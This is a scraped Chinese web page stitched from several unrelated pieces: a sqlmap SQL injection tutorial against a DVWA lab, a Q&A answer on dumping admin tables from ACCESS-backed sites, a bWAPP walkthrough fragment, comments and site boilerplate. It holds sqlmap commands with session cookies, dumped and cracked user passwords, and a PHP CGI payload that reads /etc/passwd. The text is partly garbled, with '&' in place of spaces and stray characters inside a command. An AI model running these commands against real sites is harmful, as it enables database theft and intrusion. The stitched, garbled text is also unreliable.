如何使如何用sqlmap扫描后台app

SQL注入之SQLmap入门 -
| 关注黑客与极客
SQL注入之SQLmap入门
共2125222人围观
,发现 47 个不明物体
什么是SQLmap?
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。
读者可以通过位于SourceForge的官方网站下载SQLmap源码:
SQLmap的作者是谁?
Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过与他联系。
同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。
执行SQLmap的命令是什么?
进入sqlmap.py所在的目录,执行以下命令:
#python&sqlmap.py&-h
(译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)
SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。
如何使用SQLmap:
为方便演示,我们创建两个虚拟机:
1、受害者机器, windows & & XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。
2、攻击器机器,使用Ubuntu & & 12.04,包含SQLmap程序。
本次实验的目的:使用SQLmap得到以下信息:
3、枚举MYSQL用户名与密码。
4、枚举所有数据库。
5、枚举指定数据库的数据表。
6、枚举指定数据表中的所有用户名与密码。
使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。
当前得到的cookie为“security=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。
为方便演示,我们将DVWA安全等级设置为low:
接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:
“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
因此该页面就是我们的目标页面。
以下命令可以用来检索当前数据库和当前用户:
“./sqlmap.py&-u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”&–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low”&-b&–current-db&–current-user”
使用选项:
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
2、-u : 指定目标URL
3、-b : 获取DBMS banner
4、–current-db : 获取当前数据库
5、–current-user:获取当前用户
结果如下:
可以看到结果如下:
DBMS&:&MySQLversion&5.0
OS&versionUbuntu&12.04
current&user:root
current&db&:DVWA
以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:
“sqlmap.py&-u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”&--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low”&--string=”Surname”&--users&--password”
使用选项:
1、–string : 当查询可用时用来匹配页面中的字符串
2、–users : 枚举DBMS用户
3、–password : 枚举DBMS用户密码hash
结果如下:
databasemanagement&system&users&[142]:
[*]&”@’kingasmk’
[*]”@’localhost’
[*]‘debian-sys-maint’@'localhost’
[*]‘phpmyadmin’@'localhost’
[*]‘root’@’127.0.0.1′
[*]&‘root’@'::1′
[*]‘root’@'kingasmk’
[*]‘root’@'localhost’
数据库管理系统用户和密码hash:
[*]debian-sys-maint&[1]:
password&hash:*C98BC8B94B3BAB295A
[*]&phpmyadmin[1]:
password&hash:*C98BC8B94B3BAB295A
[*]&root&[4]:
password&hash:&*C98BC8B94B3BAB295A
password&hash:*C98BC8B94B3BAB295A
password&hash:*C98BC8B94B3BAB295A
password&hash:*C98BC8B94B3BAB295A
读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:
“sqlmap.py&-u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low”&--dbs”
使用选项:
–dbs: 枚举DBMS中的数据库
结果如下:
availabledatabases&[5]:
[*]information_schema
[*]performance_schema
[*]phpmyadmin
下面我们尝试枚举DVWA数据表,执行以下命令:
“sqlmap.py-u&“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”&--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low”&-D&dvwa&--tables”
使用选项:
1、-D : 要枚举的DBMS数据库
2、–tables & & : 枚举DBMS数据库中的数据表
得到结果如下:
Database:&dvwa
[2&tables]
+————+
|&guestbook&|
+————+
下面获取用户表的列,命令如下:
&“sqlmap.py&-u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”&--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low”&-D&dvwa&-T&users&--columns”
使用选项:
-T : 要枚举的DBMS数据库表
–columns : 枚举DBMS数据库表中的所有列
结果如下:
Database:&dvwa
Table:&users
[6&columns]
+————+————-+
|&Column&|&Type|
+————+————-+
|&avatar&|varchar(70)&|
|&first_name&|varchar(15)&|
|&last_name&|varchar(15)&|
|&password&|varchar(32)&|
|&user&|varchar(15)&|
|&user_id&|int(6)&|
+————+————-+
如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:
“sqlmap.py&-u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;&security=low”&-D&dvwa&-T&users-C&user,password&--dump”
使用选项:
-T : 要枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列
–dump : 转储DBMS数据表项
SQLmap会提问是否破解密码,按回车确认:
得到所有用户名与明文密码如下:
Database:&dvwa
Table:&users
[5&entries]
+———+———+———————————————+
|&user_id&|&user|&password&|
+———+———+———————————————+
|&1&|&admin&|&5f4dcc3b5aa765d61d8327deb882cf99(password)&|
|&2&|&gordonb&|e99a18c428cb38d5fe03&(abc123)&|
|&3&|&3d75ae2cd4fcc69216b&(charley)&|
|&4&|&pablo&|0d107d09f5bbe40cade3de5c71e9e9b7&(letmein)&|
|&5&|&smithy&|5f4dcc3b5aa765d61d8327deb882cf99&(password)&|
+———+———+———————————————+
这时我们就可以利用admin帐户登录做任何事了。
SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。
29篇文章等级:5级
这家伙太懒,还未填写个人描述!
刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在&&来自星星的你&&中使用最经典的系统,从而一举成名,被京东CEO李开复收购,于某年某月成功进军&&天天向上&&,凭着一首对女朋友的思念的高歌,而闻名世界.
干过开发,日过渗透,某乙方渗透&_& &#039...
发过 两篇 更详细的。。。http://drops.wooyun.org/tips/143http://drops.wooyun.org/tips/401
重复造轮子
@lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了
必须您当前尚未登录。
必须(保密)
这家伙太懒,还未填写个人描述!
分享每日精选文章sqlmap怎么注入ACCESS数据库_百度知道
sqlmap怎么注入ACCESS数据库
跑表,命令是sqlmap&–u&“url/NewsShow.asp?id=69”&–tables。遇到这个,可以直接选择回车。等到了这里,选择线程1到10开始扫表,也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表。然后直接再次输入命令sqlmap&–u&“url/NewsShow.asp?id=69”&–colunmns&–T admin。得到了里面的字段username password id,然后直接跑字段内容sqlmap&–u&“url/NewsShow.asp?id=69”&–dumps&–T admin&–C&“username,password”。然后一路还是回车。到了下图所示,还是选择线程1到10最后跑出了用户名、密码。
其他类似问题
为您推荐:
提问者采纳
首先我们先来跑表命令是sqlmap –u “url/NewsShow.asp?id=69” –tables一路上大家遇到这个可以直接选择回车等到了这里大家选择线程1到10开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin然后得到了里面的字段username password id然后我们直接跑字段内容sqlmap –u “url/NewsShow.供单垛竿艹放讹虱番僵asp?id=69” –dumps –T admin –C “username,password”然后一路还是回车。到了还是选择线程1到10最后跑出了用户名。密码
工程信息部总经理
access数据库的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁2016年七月
2016年五月
2016年四月
2016年三月
2016年二月
2016年一月
2015年十二月
2015年十一月
2015年十月
2015年九月
2015年八月
2015年七月
2015年六月
2015年五月
2015年四月
2015年三月
2015年二月
2015年一月
2014年十二月
2014年十一月
2014年十月
2014年九月
2014年八月| 漏洞检测 |
| 隐藏捆绑 |
BWAPP:一款非常好用的漏洞演示平台(2)
15、PHP CGI Remote Code Execution 查看源代码 ?-s 读取文件:?-dauto_prepend_file%3d/etc/passwd+-n 使用msf getshell:配置参数 GETSHELL: 16、Shellshock Vulnerability (CGI) 抓包,修改请求的请求头: 17、U
15、PHP CGI Remote Code Execution
查看源代码 ?-s
读取文件:?-dauto_prepend_file%3d/etc/passwd+-n
使用msf getshell:配置参数
16、Shellshock Vulnerability (CGI)
抓包,修改请求的请求头:
17、Unvalidated Redirects & Forwards
点击beam,抓包修改参数url=:
18、Unrestricted File Upload
浏览,上传shell:
19、WSDL FILE
访问:?wsdl
使用wvs对web service扫描:
使用sqlmap测试:
还有其他漏洞就不一一测试了,大家有兴趣可以去测试。
(责任编辑:幽灵学院)
------分隔线----------------------------
现在有很多防御或缓解DDoS攻击的服务,但是如何第一时间发现网站被D仍然是个难题。这...
如果说你的资产有可能被国内外的攻击者盯上并没有把你吓得半死,那就不必读这篇文章。...
Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。 特性 检测所有URL参...
工具简介: 通常在调查入侵事件的时候,工具化能最大限度的提升效率,且减少人为主观...
CMSmap是一个Python编写的针对开源CMS(内容管理系统)的安全扫描器,它可以自动检测...
0x01 前言: Charles是一款抓包修改工具,相比起burp,charles具有界面简单直观,易于...
admin@1744.cc
工作日:9:00-21:00
周 六:9:00-18:00
&&扫一扫关注幽灵学院
广告服务:QQ:

我要回帖

更多关于 sqlmap 批量扫描注入 的文章

 

随机推荐